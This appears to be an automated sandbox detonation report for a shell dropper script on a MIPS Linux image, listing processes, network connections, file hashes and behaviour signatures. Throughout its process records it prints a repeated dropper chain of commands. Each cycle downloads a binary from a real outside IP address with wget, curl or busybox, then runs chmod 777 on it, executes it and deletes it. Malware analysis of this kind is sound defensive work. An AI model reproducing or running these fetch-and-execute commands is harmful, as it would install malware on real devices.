[chmod 777 U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC

[./U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/rm

[rm U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/usr/bin/wget

[wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/chmod

[chmod 777 vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz

[./vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/rm

[rm vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/usr/bin/wget

[wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/chmod

[chmod 777 zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6

[./zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/rm

[rm zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/usr/bin/wget

[wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/chmod

[chmod 777 idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV

[./idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/rm

[rm idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/usr/bin/wget

[wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/chmod

[chmod 777 p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783

[./p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/rm

[rm p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/usr/bin/wget

[wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/chmod

[chmod 777 me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17

[./me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/rm

[rm me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-20 02:45

Reported

2024-11-20 02:48

Platform

debian9-mipsel-20240611-en

Max time kernel

94s

Max time network

97s

Command Line

[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 N/A
N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX N/A
N/A /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW N/A
N/A /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI N/A
N/A /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE N/A
N/A /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC N/A
N/A /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz N/A
N/A /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 N/A
N/A /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV N/A
N/A /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 N/A
N/A /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 N/A
N/A /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF N/A
N/A /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug N/A
N/A /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF N/A
N/A /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug N/A
N/A /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 N/A
N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX N/A
N/A /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW N/A
N/A /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI N/A
N/A /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE N/A
N/A /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC N/A
N/A /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz N/A
N/A /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 N/A
N/A /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV N/A
N/A /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 N/A
N/A /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A N/A /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF /usr/bin/curl N/A
File opened for modification /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /usr/bin/curl N/A
File opened for modification /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /usr/bin/curl N/A
File opened for modification /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /usr/bin/curl N/A
File opened for modification /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz /usr/bin/curl N/A
File opened for modification /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV /usr/bin/curl N/A
File opened for modification /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /usr/bin/curl N/A
File opened for modification /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /usr/bin/curl N/A
File opened for modification /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /usr/bin/curl N/A
File opened for modification /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /usr/bin/curl N/A
File opened for modification /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV /usr/bin/curl N/A
File opened for modification /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 /usr/bin/curl N/A
File opened for modification /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /usr/bin/curl N/A
File opened for modification /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE /usr/bin/curl N/A
File opened for modification /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 /usr/bin/curl N/A
File opened for modification /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug /usr/bin/curl N/A
File opened for modification /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF /usr/bin/curl N/A
File opened for modification /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug /usr/bin/curl N/A
File opened for modification /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 /usr/bin/curl N/A
File opened for modification /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX /usr/bin/curl N/A
File opened for modification /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /usr/bin/curl N/A
File opened for modification /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW /usr/bin/curl N/A
File opened for modification /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 /usr/bin/curl N/A
File opened for modification /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 /usr/bin/curl N/A
File opened for modification /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC /usr/bin/curl N/A
File opened for modification /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 /usr/bin/curl N/A
File opened for modification /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI /usr/bin/curl N/A
File opened for modification /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 /usr/bin/curl N/A

Processes

/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh

[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/chmod

[chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2

[./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/bin/rm

[rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]

/usr/bin/wget

[wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/chmod

[chmod 777 UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5

[./UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/bin/rm

[rm UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]

/usr/bin/wget

[wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/chmod

[chmod 777 Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX

[./Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/bin/rm

[rm Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]

/usr/bin/wget

[wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/chmod

[chmod 777 kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW

[./kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/bin/rm

[rm kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]

/usr/bin/wget

[wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/chmod

[chmod 777 l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI

[./l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/bin/rm

[rm l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]

/usr/bin/wget

[wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/chmod

[chmod 777 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE

[./6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/bin/rm

[rm 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]

/usr/bin/wget

[wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/chmod

[chmod 777 U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC

[./U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/bin/rm

[rm U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]

/usr/bin/wget

[wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/chmod

[chmod 777 vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz

[./vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/bin/rm

[rm vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]

/usr/bin/wget

[wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/chmod

[chmod 777 zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6

[./zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/bin/rm

[rm zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]

/usr/bin/wget

[wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/chmod

[chmod 777 idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV

[./idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/bin/rm

[rm idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]

/usr/bin/wget

[wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/chmod

[chmod 777 p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783

[./p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/bin/rm

[rm p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]

/usr/bin/wget

[wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/chmod

[chmod 777 me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17

[./me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/bin/rm

[rm me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]

/usr/bin/wget

[wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/chmod

[chmod 777 GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF

[./GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]

/bin/rm

